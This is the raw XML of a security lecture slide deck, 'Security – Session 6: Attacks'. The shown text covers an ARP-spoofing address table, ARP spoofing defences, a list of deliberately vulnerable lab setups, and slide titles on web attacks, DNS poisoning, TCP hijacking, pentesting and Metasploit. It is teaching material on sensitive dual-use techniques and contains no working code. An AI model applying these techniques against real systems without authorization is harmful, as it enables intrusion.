              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>00:11:22:33:44:01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3959D818-8EB4-A709-FD66-F1CF60E5E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201" y="4190168"/>
            <a:ext cx="240963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</a:rPr>
              <a:t>192.168.1.105</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>00:11:22:33:44:02</a:t>
            </a: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CDF5667-34F3-DA76-29BD-4EA553EA77AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5034058" y="1621454"/>
            <a:ext cx="24096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B0503020000020004" pitchFamily="18" charset="-127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>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>192.168.1.106</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>00:11:22:33:44:03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D77AAE-40C1-7643-428C-80B17959C08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695031" y="4440854"/>
            <a:ext cx="609601" cy="898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62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5B05-DCBE-7ED5-DAF8-10D6BE45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ARP Spoofing Defenses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C01D8-24E4-036A-89ED-4C712C8FE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3C61B-A4B5-2363-A139-04D15B22B600}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838199" y="2002152"/>
            <a:ext cx="1091097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/>
              <a:t>Using static entries solves the problem but it is almost impossible to manage!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/>
              <a:t>Check multiple occurrence of the same MAC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/>
              <a:t>i.e., one MAC mapping to multiple IP addresses (see previous slide’s example)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/>
              <a:t>Software detection solutions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/>
              <a:t>Anti-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" err="1"/>
              <a:t>arpspoof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" err="1"/>
              <a:t>Xarp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" err="1"/>
              <a:t>Arpwatch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756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B0BBB-C1B4-605D-F936-206619F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04043-F8A3-40A0-AD75-064CA998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31C704-55A3-B131-D212-671103C5ED3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="908983" y="1250730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How do attackers proceed?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51A50-AE5E-A16A-5486-FEA3EF1145F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="908983" y="2312118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Web Application Security Vulnerabilities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B7103-6E6B-AB68-1DC5-F4171CC4AC15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="908983" y="3373506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Network Vulnerabilities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58FBA-15E7-E9DB-DFF8-C5130938CDEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="908982" y="4434894"/>
            <a:ext cx="10925665" cy="798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Ethical Hacking and Penetration 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4147A-06D5-2161-B675-FC11C82D98D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="908981" y="5496284"/>
            <a:ext cx="10925665" cy="798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Useful Tools for PenTesting for Variouses Attack Phases</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40146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5DBB-2E32-9690-FE9E-4BADF7ED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PenTesting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Intro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ACFB9-F928-0B6B-16CE-15C3C10D9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16BC-2B60-69E7-D68F-BEEC343B2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35" y="1859247"/>
            <a:ext cx="6937535" cy="407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4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8526-9706-48CE-6218-61C70B6C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Phases of Penetration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595E18-701F-CACB-3E35-1F22436E9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70B5B-42EC-121E-7BFA-9C70FEA5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99" y="1719451"/>
            <a:ext cx="6028517" cy="43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4D49-9FA3-BF6E-9B98-3353C19A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Operational Penetration Testing Phases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326146-D97C-1F67-65CC-BAF8EEF37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15B03-8357-0F8B-AD53-A071B8EB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51" y="2015785"/>
            <a:ext cx="7247497" cy="37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99FC-1772-B013-661C-896D7B39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Pentest Pre-Engagement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ACAEC-C0A8-C763-285C-14AF7C99C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CDC14-943C-2EA3-6733-81B24E12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25" y="1235915"/>
            <a:ext cx="7191782" cy="531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D7C7-5900-48D6-9969-BD260E932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Setting Up a Pentest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F8084-DFEF-3808-C954-5BFBB6EA1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1C4FC-1FEE-2E4C-26E7-E03FACE8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8" y="1923904"/>
            <a:ext cx="7724141" cy="356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5B34-CA4C-888D-55E6-7C293F7C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Exploitable Setups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273DA-9D1F-9FFE-48BD-BC47760A7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A9C5D-4055-DB55-6177-7535F104B503}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028700" y="2247900"/>
            <a:ext cx="895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Metasploitable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 and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Windows and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OWASP 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OWASP Juice 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Multillidae</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> and XAMPP: vulnerable web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CloudGoat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>: vulnerable AWS setup</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="388967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8801</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>1325</Paragraphs>
  <Slides>156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76" baseType="lpstr">
      <vt:lpstr>ＭＳ Ｐゴシック</vt:lpstr>
      <vt:lpstr>ＭＳ Ｐゴシック</vt:lpstr>
      <vt:lpstr>AmazonEmber</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Arial Narrow</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Comic Sans MS</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Courier Std</vt:lpstr>
      <vt:lpstr>CrimsonPro-Regular</vt:lpstr>
      <vt:lpstr>Gill Sans MT</vt:lpstr>
      <vt:lpstr>MinionPro-Regular</vt:lpstr>
      <vt:lpstr>neue-haas-unica</vt:lpstr>
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Trebuchet MS</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Security – Session 6: Attacks</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Phases in an attack – Cyber Kill Chain</vt:lpstr>
      <vt:lpstr>Information Gathering</vt:lpstr>
      <vt:lpstr>Information Gathering</vt:lpstr>
      <vt:lpstr>MITRE ATTACK Framework</vt:lpstr>
      <vt:lpstr>MITRE Attack Framework</vt:lpstr>
      <vt:lpstr>MITRE Attack Framework</vt:lpstr>
      <vt:lpstr>MITRE Attack Framework Mitigations</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Securing your Web Application</vt:lpstr>
      <vt:lpstr>Securing your Web Application: Threats!</vt:lpstr>
      <vt:lpstr>OWASP</vt:lpstr>
      <vt:lpstr>SQL Injection: What is wrong?</vt:lpstr>
      <vt:lpstr>SQL Injection: What is wrong?</vt:lpstr>
      <vt:lpstr>SQL Injection: What is wrong?</vt:lpstr>
      <vt:lpstr>SQL Injection: Summary!</vt:lpstr>
      <vt:lpstr>SQL Injection: Prevention!!</vt:lpstr>
      <vt:lpstr>Cross Site Scripting (XSS): What is wrong?</vt:lpstr>
      <vt:lpstr>Cross Site Scripting (XSS): What is wrong?</vt:lpstr>
      <vt:lpstr>Cross Site Scripting (XSS): Summary!</vt:lpstr>
      <vt:lpstr>XSS Types</vt:lpstr>
      <vt:lpstr>Exkurs: Juice Shop</vt:lpstr>
      <vt:lpstr>Demo: DOM-based XSS</vt:lpstr>
      <vt:lpstr>Cross Site Scripting (XSS): Prevention!!</vt:lpstr>
      <vt:lpstr>Cross Site Request Forgery (CSRF): Summary!</vt:lpstr>
      <vt:lpstr>CSRF Process</vt:lpstr>
      <vt:lpstr>Cross Site Request Forgery (CSRF): Prevention!!</vt:lpstr>
      <vt:lpstr>Unvalidated Input: What is wrong?</vt:lpstr>
      <vt:lpstr>Unvalidated Input: Summary!</vt:lpstr>
      <vt:lpstr>Unvalidated Input: Prevention!!</vt:lpstr>
      <vt:lpstr>Session Management: Problem or Solution?!</vt:lpstr>
      <vt:lpstr>Session Management: Problem or Solution?!</vt:lpstr>
      <vt:lpstr>Session Management: Problem or Solution?!</vt:lpstr>
      <vt:lpstr>Cross-Origin-Resource Sharing (CORS) Motivation and Same Site Origin Policy</vt:lpstr>
      <vt:lpstr>CORS part II</vt:lpstr>
      <vt:lpstr>Server-Side Request Forgery (SSRF)</vt:lpstr>
      <vt:lpstr>SSRF process</vt:lpstr>
      <vt:lpstr>Where to look for SSRF</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Other prevention mechanisms</vt:lpstr>
      <vt:lpstr>Also consider bypasses</vt:lpstr>
      <vt:lpstr>Application Layer Security</vt:lpstr>
      <vt:lpstr>Some Advices</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>DNS Resolver</vt:lpstr>
      <vt:lpstr>DNS Stub Resolver</vt:lpstr>
      <vt:lpstr>Normal DNS Lookup</vt:lpstr>
      <vt:lpstr>Normal DNS Lookup </vt:lpstr>
      <vt:lpstr>DNS Caching</vt:lpstr>
      <vt:lpstr>Some DNS Vulnerabilities</vt:lpstr>
      <vt:lpstr>DNS Cache Poisoning</vt:lpstr>
      <vt:lpstr>NS Records</vt:lpstr>
      <vt:lpstr>DNS Cache Poisoning: Racing to Respond First</vt:lpstr>
      <vt:lpstr>DNS Cache Poisoning Principle</vt:lpstr>
      <vt:lpstr>DNS Cache Poisoning – Exploiting the Vuln</vt:lpstr>
      <vt:lpstr>DNS Cache Poisoning – Enhance the Prob </vt:lpstr>
      <vt:lpstr>DNS Cache Poisoning – Guess the ID</vt:lpstr>
      <vt:lpstr>DNS Poisoning Defenses</vt:lpstr>
      <vt:lpstr>DDoS Attacks</vt:lpstr>
      <vt:lpstr>DDoS Attacks - Hiding</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>TCP: overview  RFCs: 793,1122, 2018, 5681, 7323</vt:lpstr>
      <vt:lpstr>TCP segment structure</vt:lpstr>
      <vt:lpstr>TCP sequence numbers, ACKs</vt:lpstr>
      <vt:lpstr>TCP sequence numbers, ACKs</vt:lpstr>
      <vt:lpstr>TCP connection management</vt:lpstr>
      <vt:lpstr>Agreeing to establish a connection</vt:lpstr>
      <vt:lpstr>TCP 3-way handshake</vt:lpstr>
      <vt:lpstr>TCP Session Hijacking</vt:lpstr>
      <vt:lpstr>TCP Session Hijacking a bit more concrete</vt:lpstr>
      <vt:lpstr>SYN Flooding Attack</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>IP Spoofing</vt:lpstr>
      <vt:lpstr>Spoofed IP traffic</vt:lpstr>
      <vt:lpstr>Exploits of IP spoofing attacks</vt:lpstr>
      <vt:lpstr>Why is IP spoofing possible and how to mitigate?</vt:lpstr>
      <vt:lpstr>Example of a Spoofing Attack</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>MAC addresses</vt:lpstr>
      <vt:lpstr>MAC addresses</vt:lpstr>
      <vt:lpstr>MAC addresses</vt:lpstr>
      <vt:lpstr>ARP: address resolution protocol</vt:lpstr>
      <vt:lpstr>ARP protocol in action</vt:lpstr>
      <vt:lpstr>ARP protocol in action</vt:lpstr>
      <vt:lpstr>ARP protocol in action</vt:lpstr>
      <vt:lpstr>ARP Spoofing – Some Remarks</vt:lpstr>
      <vt:lpstr>Poisoned ARP Caches (MITM attack)</vt:lpstr>
      <vt:lpstr>ARP Spoofing Defenses</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>PenTesting Intro</vt:lpstr>
      <vt:lpstr>Phases of Penetration Testing</vt:lpstr>
      <vt:lpstr>Operational Penetration Testing Phases</vt:lpstr>
      <vt:lpstr>Pentest Pre-Engagement</vt:lpstr>
      <vt:lpstr>Setting Up a Pentest Environment</vt:lpstr>
      <vt:lpstr>Useful Exploitable Setups</vt:lpstr>
      <vt:lpstr>Reconnaissance / Information Gathering / Footprinting</vt:lpstr>
      <vt:lpstr>Reconnaissance and Information Gathering Activities</vt:lpstr>
      <vt:lpstr>Open Source Intelligence</vt:lpstr>
      <vt:lpstr>Footprinting - Gather Domain Information</vt:lpstr>
      <vt:lpstr>Other OSINT</vt:lpstr>
      <vt:lpstr>Other OSINT</vt:lpstr>
      <vt:lpstr>OSINT – Security Breaches</vt:lpstr>
      <vt:lpstr>Scanning and Enumeration</vt:lpstr>
      <vt:lpstr>Scanning and Enumeration Activities</vt:lpstr>
      <vt:lpstr>Stealth Scanning Techniques</vt:lpstr>
      <vt:lpstr>Quick side-step: TOR and Onion Routing</vt:lpstr>
      <vt:lpstr>Tor Data Transfer</vt:lpstr>
      <vt:lpstr>TOR config</vt:lpstr>
      <vt:lpstr>Some Stealth Scanning Advices</vt:lpstr>
      <vt:lpstr>Scanning</vt:lpstr>
      <vt:lpstr>Scanning with decoys in nmap</vt:lpstr>
      <vt:lpstr>DNS reconnaissance and route mapping</vt:lpstr>
      <vt:lpstr>Other DNS Reconaissance Tools</vt:lpstr>
      <vt:lpstr>Mapping route to Target</vt:lpstr>
      <vt:lpstr>Identifying external network infrastructure</vt:lpstr>
      <vt:lpstr>Mapping beyond firewall</vt:lpstr>
      <vt:lpstr>Other Host Enumeration Tools</vt:lpstr>
      <vt:lpstr>Gaining Information about Life Hosts</vt:lpstr>
      <vt:lpstr>DHCP Information</vt:lpstr>
      <vt:lpstr>ARP Sniffing</vt:lpstr>
      <vt:lpstr>Ping Sweep</vt:lpstr>
      <vt:lpstr>Other Aspects of Scanning</vt:lpstr>
      <vt:lpstr>What comes after Scanning?</vt:lpstr>
      <vt:lpstr>Gaining Access</vt:lpstr>
      <vt:lpstr>Gaining Access Activities</vt:lpstr>
      <vt:lpstr>Metasploit Framework</vt:lpstr>
      <vt:lpstr>Access Interface and modules</vt:lpstr>
      <vt:lpstr>Prepare Metasploit</vt:lpstr>
      <vt:lpstr>After the scan: explore the vulnerabilities</vt:lpstr>
      <vt:lpstr>Five Stages of Custom Exploit Development</vt:lpstr>
      <vt:lpstr>Maintaining Access</vt:lpstr>
      <vt:lpstr>Maintaining Access Activities</vt:lpstr>
      <vt:lpstr>Activities on compromised system </vt:lpstr>
      <vt:lpstr>Rapid Reconnaissance on Compromised System</vt:lpstr>
      <vt:lpstr>Meterpreter</vt:lpstr>
      <vt:lpstr>Horizontal Escalation and Lateral Movement</vt:lpstr>
      <vt:lpstr>Privilege Escalations</vt:lpstr>
      <vt:lpstr>Escalation Explained</vt:lpstr>
      <vt:lpstr>Other Aspects</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Introduction to nmap</vt:lpstr>
      <vt:lpstr>Use Case – Discovering open tcp ports</vt:lpstr>
      <vt:lpstr>Process for Enumeration with nmap</vt:lpstr>
      <vt:lpstr>Packet Trace Nmap</vt:lpstr>
      <vt:lpstr>Connect Scan</vt:lpstr>
      <vt:lpstr>Filtered Ports</vt:lpstr>
      <vt:lpstr>UDP Scans</vt:lpstr>
      <vt:lpstr>Full Port and Service Scans</vt:lpstr>
      <vt:lpstr>Additional Information about nmap</vt:lpstr>
      <vt:lpstr>Alternatives if service cannot be discovered automatically</vt:lpstr>
      <vt:lpstr>Nmap scripting engine</vt:lpstr>
      <vt:lpstr>TO BER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Elefant</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-01-18T07:24:59Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-20T08:09:17Z</dcterms:modified>
</cp:coreProperties>
</file>